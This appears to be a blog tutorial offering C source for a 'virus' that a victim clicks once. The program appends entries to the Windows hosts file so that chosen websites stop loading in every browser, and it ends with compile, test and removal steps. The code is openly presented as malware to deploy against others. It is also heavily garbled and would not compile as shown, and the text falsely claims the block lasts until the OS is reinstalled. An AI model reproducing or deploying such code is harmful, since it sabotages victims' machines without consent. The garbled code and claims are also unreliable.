Virus Program to Block Websites
Most of us are familiar with the virus that blocked sites Orkut and YouTube. If you're curious about creating a virus on your own, that's how you can do. As usual, I will use my favorite programming language "C" to create the site blocking virus. I will give a brief introduction to this virus before jumping to technical jargon.
This virus has been created exclusively for the "C". So, anyone with a basic knowledge of C will be able to understand the functioning of the virus. This virus needs to be clicked only once a victim. When clicked, it will prevent the list of sites that are defined in the source code. The victim will never be able to navigate the pages, unless you re-install the operating system. This rejection is not limited to IE or Firefox. So, once blocked, the site does not appear in any web browser.
You can also lock a site manually lock manually.The process as described in How to block a website?
This is the source of the virus.
# Include
# Include
# Include
char ip [12] = "";
FILE * target;
find_root int (void);
block_site (void);
find_root int ()
int done;
struct ffblk ffblk; block structure / / File
Done = FindFirst ("C: \ \ WINDOWS \ \ system32 \ \ drivers \ \ etc \ \ hosts", & ffblk, FA_DIREC);
/ * To determine the root of drive * /
if (done == 0)
target = fopen ("C: \ \ Windows \ \ system32 \ \ drivers \ \ etc \ \ hosts", "r +");
/ * Open file * /
Return 1;
First is to find = ("D: \ \ Windows \ \ system32 \ \ drivers \ \ etc \ \ hosts" and ffblk, FA_DIREC);
/ * Set the root to run * /
if (done == 0)
target = fopen ("D: \ \ WINDOWS \ \ system32 \ \ drivers \ \ etc \ \ hosts" file, "r +");
/ * Open the file * /
Return 1;
Done FindFirst = ("E: \ \ WINDOWS \ \ system32 \ \ drivers \ \ etc \ \ hosts", & ffblk, FA_DIREC);
/ * To determine the root of drive * /
if (done == 0)
target = fopen ("E: \ \ windows \ \ system32 \ \ drivers \ \ etc \ \ hosts", "r +");
/ * Open file * /
return 1;
done = FindFirst ("F: \ \ windows \ \ system32 \ \ drivers \ \ etc \ \ hosts" and ffblk, FA_DIREC);
/ * Set the root to run * /
if (done == 0)
target = fopen ("F: \ \ WINDOWS \ \ system32 \ \ drivers \ \ etc \ \ hosts" file, "r +");
/ * Open the file * /
Return 1;
else return 0;
block_site zero ()
int i;
fseek (target, 0, SEEK_END); / * Go to end of file * /
fprintf (target, "\ n");
for (i = 0; i <6; i + +)
fprintf (target, "% s \ t% s \ n", ip, site_lists [i]);
fclose (target);
void main ()
int success = 0;
find_root success = ();
if (success)
block_site ();
How to assemble?
Compilation Guide for step by step, see my post How to compile C programs
To test first, run the compiled module. It will block sites that are listed in the source code.
2. Once the block_Site.exe file, launch the browser. Then type the URL of blocked sites, and you will see the browser displays an error message "This page is not displayed."
3. To remove a virus from the rest of the race.
% Windir% \ system32 \ drivers \ etc
4. There, open the "hosts" file with notepad.At bottom of the file open, you'll see something like
5. Remove all entries that contain the names of blocked sites.